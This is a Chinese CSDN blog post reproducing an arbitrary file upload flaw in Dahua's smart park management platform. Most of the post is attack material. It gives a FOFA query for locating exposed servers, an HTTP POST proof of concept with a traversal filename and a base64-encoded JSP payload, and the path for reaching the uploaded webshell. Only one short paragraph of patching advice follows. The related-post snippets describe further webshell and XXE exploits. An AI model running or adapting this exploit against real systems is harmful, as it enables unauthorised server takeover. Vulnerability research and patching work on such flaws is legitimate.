大华智慧园区poi任意文件上传漏洞(企业及时修复)

最新推荐文章于 2024-07-29 10:21:20 发布
最新推荐文章于 2024-07-29 10:21:20 发布
阅读量389 收藏 7
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/137539347
版权
文章报道了大华智慧园区的POI服务存在文件上传漏洞,提供了一个POC示例。建议用户及时打补丁并限制访问源,以防止安全风险。同时强调内容仅供技术讨论,非法律途径使用需负法律责任。
摘要由CSDN通过智能技术生成

大华智慧园区 poi 任意文件上传漏洞复现 (截止发文时间,部分网站已修复)

还是老规矩,fofa先上
fofa指纹:body=”/WPMS/asset/lib/gridster/“

图片

主站页面如下

图片

上poc

图片

POC文字版

 

  1.  
    POST /emap/webservice/gis/soap/poi HTTP/1.1
     
  2.  
    Host: e.m.p.e:ror
     
  3.  
     
  4.  
    /../../emperor.jsp
     
  5.  
     
  6.  
    PCVAcGFnZSBpbXBvcnQ9ImphdmEudGV4dC4qLGphdmEudXRpbC4qLGphdmEuaW8uKiIlPg
     
  7.  
    o8JQpTaW1wbGVEYXRlRm9ybWF0IGRmID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eS1NTS1kZC
     
  8.  
    BISDptbTpzcyIpOwpvdXQucHJpbnRsbihkZi5mb3JtYXQobmV3IERhdGUoKSkpOwpGaWxlIGZpbGUg
     
  9.  
    PSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKC
     
  10.  
    kpKTsKZmlsZS5kZWxldGUoKTsKJT4=
     
 

传了马以后直接访问
 

 

图片
 

文字路径:/upload/马子.jsp
 

 

0x05 修复建议
 

    建议使用相关系统的用户在尽快打补丁的同时,做好访问来源的限制,尽量避免大华智慧园区综合管理平台暴露在公网或不安全的网络环境中。
 

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 


 渗透工具
 

技术文档、书籍
 

 

面试题
 

 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 

应急响应笔记
 

 

学习路线
 

 


                

        

        

    




    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    4
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    7
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
大华智慧园区综合管理平台poi任意文件上传漏洞

				
			

			

				

					xiaokp7的博客
				

				

					09-07
					
					732
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台在/emap/webservice/gis/soap/poi接口处存在任意文件上传漏洞,可以利用此漏洞获得webshell。

			
		

	



                

              
                



	

		

			

				
					
大华智慧园区综合管理平台存在任意文件上传漏洞getshell

				
			

			

				

					失心少年
				

				

					07-19
					
					1007
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。

			
		

	



                


  
              

                


	

		

			

				
					
[20][03][06] Apache POI 安全漏洞(CVE-2019-12415)

				
			

			

				

					安全新司机
				

				

					12-21
					
					6992
					
				

			

		

		

			
				
文章目录1. 描述2. 场景3. 漏洞复现3.1 引入 apache poi 组件 4.1.0 版本3.2 下载测试用例 excel3.3 制作恶意 excel3.4 测试代码4. 修复方案
1. 描述
Apache POI是 Apache 的一个开源函数库,它提供API给Java程序可对 Excel 进行读和写操作的组件
poi 组件存在以下 CVE

2. 场景
此次要分析的是 CVE-2019-12415
Apache POI 版本 <= 4.1.0 中,当使用 XSSFExportToXml 

			
		

	





	

		

			

				
					
Apache POI 安全漏洞

				
			

			

				

					weixin_44778952的博客
				

				

					11-12
					
					2265
					
				

			

		

		

			
				
漏洞来源
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-1431
漏洞详情
Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在代码问题漏洞。攻击者可借助特制的文档利用该漏洞读取本地文件系统中或网络资源中的文件。
参考资料
来源:lists.apache.org
链接:ht

			
		

	



		

			
		



	

		

			

				
					
Apache POI 3.10.1外部实体漏洞(CVE-2014-3529)

					
最新发布

				
			

			

				

					qq_23003811的博客
				

				

					07-29
					
					305
					
				

			

		

		

			
				
然后到[Content_Types].xml进行压缩为zip文件,得到[Content_Types].zip。最后是重命令[Content_Types].zip为[Content_Types].xlsx。1、修改[Content_Types].xml中的file:///flag达到任意文件读取。1、准备一台vps服务器IP为91.208.73.100,上传xxe.dtd到服务器上。3、制作payload,[Content_Types].xlsx。4、在页面上传[Content_Types].xlsx。

			
		

	





	

		

			

				
					
[漏洞复现]Apache POI < 3(2),网络安全面试必问

				
			

			

				

					2401_84185471的博客
				

				

					04-10
					
					286
					
				

			

		

		

			
				
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!创建一个**[Content_Types].xml文件和xxe.dtd文件注意名字不可修改**因篇幅有限,仅展示部分资料。

			
		

	





	

		

			

				
					
解决Apache POI 代码问题漏洞时,缺少类的问题 (CTPageMar 等)

				
			

			

				

					Oxye
				

				

					04-17
					
					3184
					
				

			

		

		

			
				
目录问题代码漏洞告警寻找高版本解决方案一:根据告警提示替换依赖更新依赖步骤解决方案二:把缺少的类从旧包拷到本地解决方案三:终于找到靠谱的依赖总结
问题
先把问题放这
代码漏洞告警
昨天项目代码被检测到POI高危漏洞

漏洞级别:高危漏洞名称:Apache POI 代码问题漏洞 漏洞介绍 Apache
POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft
Office格式档案进行读和写。 Apache POI
4.1.0及之前版本中存在安全漏洞。攻击者

			
		

	





	

		

			

				
					
[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)

				
			

			

				

					k5664524的博客
				

				

					01-16
					
					1600
					
				

			

		

		

			
				
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。

			
		

	





	

		

			

				
					
大华智慧园区前台任意文件上传(1day)

				
			

			

				

					10-06
				

			

		

		

			
				
大华智慧园区前台任意文件上传(1day)

			
		

	





	

		

			

				
					
漏洞复现】大华智慧园区前台任意文件上传

				
			

			

				

					2201_75756681的博客
				

				

					01-03
					
					1352
					
				

			

		

		

			
				
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。二、 漏洞概述大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。

			
		

	





	

		

			

				
					
大华智慧园区综合管理平台任意文件上传漏洞

				
			

			

				

					xiaokp7的博客
				

				

					07-30
					
					1193
					
				

			

		

		

			
				
智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。

			
		

	





	

		

			

				
					
漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE-2016-4437)

				
			

			

				

					cj_Hydra's Blog
				

				

					06-15
					
					2060
					
				

			

		

		

			
				
前言:
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
影响版本:
Apache Shiro <= 1.2.4
漏洞原理:
Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 >  Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码

			
		

	





	

		

			

				
					
漏洞复现】大华智慧园区综合管理平台devicePoint文件上传漏洞

				
			

			

				

					晚风不及你
				

				

					02-22
					
					804
					
				

			

		

		

			
				
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

			
		

	





	

		

			

				
					
Goby 漏洞发布|大华智慧园区综合管理平台 poi 文件上传漏洞

				
			

			

				

					m0_46699477的博客
				

				

					11-20
					
					236
					
				

			

		

		

			
				
大华智慧园区综合管理平台是由大华技术股份有限公司(Dahua Technology)开发的一款综合管理解决方案。该平台旨在帮助园区管理者提高管理效率、提升安全水平、优化资源利用,并实现智能化的园区运营。大华智慧园区综合管理平台在 poi 路径处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

			
		

	





	

		

			

				
					
大华智慧园区综合管理平台RCE漏洞

				
			

			

				

					holyxp的博客
				

				

					07-17
					
					2019
					
				

			

		

		

			
				
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​     大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。

			
		

	





	

		

			

				
					
大华智慧园区综合管理平台 poi 任意文件上传漏洞复现

				
			

			

				

					0xSec
				

				

					12-12
					
					850
					
				

			

		

		

			
				
大华智慧园区综合管理平台 /emap/webservice/gis/soap/poi接口处存在任意文件上传漏洞,未授权的攻击者可以上传后门文件,从而控制服务器权限。

			
		

	





	

		

			

				
					
解决poi漏洞升级后的代码编译错误

				
			

			

				

					
				

				

					12-06
					
					4852
					
				

			

		

		

			
				
描述:项目中的 poi 包有点旧,很多方法都没有,现在导入新的 poi 包,导致原先项目中的 代码报错。
描述:下面是遇到的一些报错,解决方案。代码如下:


解决办法:将  替换 注释中的代码即可代码如下:


解决办法:将 HorizontalAlignment.CENTER 替换 旧的即可
所在包:import org.apache.poi.ss.usermodel.HorizontalAlignment;代码如下:


解决办法:将  替换 旧的即可
所在包:代码如下:


解决办法:将  替换 旧

			
		

	





	

		

			

				
					
Apache Log4j2漏洞

				
			

			

				

					四问四不知的博客
				

				

					12-20
					
					2385
					
				

			

		

		

			
				
序言

最近又爆出Apache Log4j2的大漏洞(CVE-2021-44228),很多使用了该框架的应用都受到了影响。影响范围极大,攻击者只需要向目标输入一段代码,不需要用户执行任何多余操作即可触发该漏洞,使攻击者可以远程控制受害者服务器。

由于Log4j 是目前全球使用最广泛的Java日志框架之一。该漏洞还影响着很多开源组件,如 Apache Struts2、Apache Solr、Apache Druid、Apache Flink 等。因为该漏洞利用方式简单,一旦有攻击者利用该漏洞,就可以在目标服

			
		

	





	

		

			

				
					
Apache poi 修复损坏的excel文件

				
			

			

				

					05-24
				

			

		

		

			
				
Apache POI 是一个用于读写 Microsoft Office 格式文件的 Java 库。它可以用来修复损坏的 Excel 文件。下面是修复损坏的 Excel 文件的步骤:

1. 使用 POIFSFileSystem 对象读取 Excel 文件。

2. 使用 HSSFWorkbook 对象读取 Excel 文件中的工作簿。

3. 使用 HSSFSheet 对象读取工作簿中的工作表。

4. 使用 HSSFRow 对象读取工作表中的行。

5. 使用 HSSFCell 对象读取行中的单元格。

6. 如果损坏的单元格可以修复,则使用 HSSFCellStyle 对象设置单元格的样式。

7. 使用 HSSFCell 对象设置单元格的值。

8. 使用 FileOutputStream 对象将修复后的 Excel 文件写回磁盘。

以下是一个简单的示例:

```java
import java.io.FileInputStream;
import java.io.FileOutputStream;
import org.apache.poi.hssf.usermodel.HSSFWorkbook;
import org.apache.poi.poifs.filesystem.POIFSFileSystem;
import org.apache.poi.ss.usermodel.Cell;
import org.apache.poi.ss.usermodel.Row;
import org.apache.poi.ss.usermodel.Sheet;

public class ExcelRepair {

    public static void main(String[] args) throws Exception {
        String filename = "corrupted.xlsx";
        FileInputStream fis = new FileInputStream(filename);
        POIFSFileSystem fs = new POIFSFileSystem(fis);
        HSSFWorkbook wb = new HSSFWorkbook(fs);

        Sheet sheet = wb.getSheetAt(0);
        Row row = sheet.getRow(0);
        Cell cell = row.getCell(0);
        if (cell.getStringCellValue().equals("CORRUPTED")) {
            cell.setCellValue("FIXED");
        }

        FileOutputStream fos = new FileOutputStream(filename);
        wb.write(fos);
        fos.close();
        wb.close();
    }
}
```

这个示例假设 Excel 文件中的第一个单元格的值为 "CORRUPTED",它将被替换为 "FIXED"。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值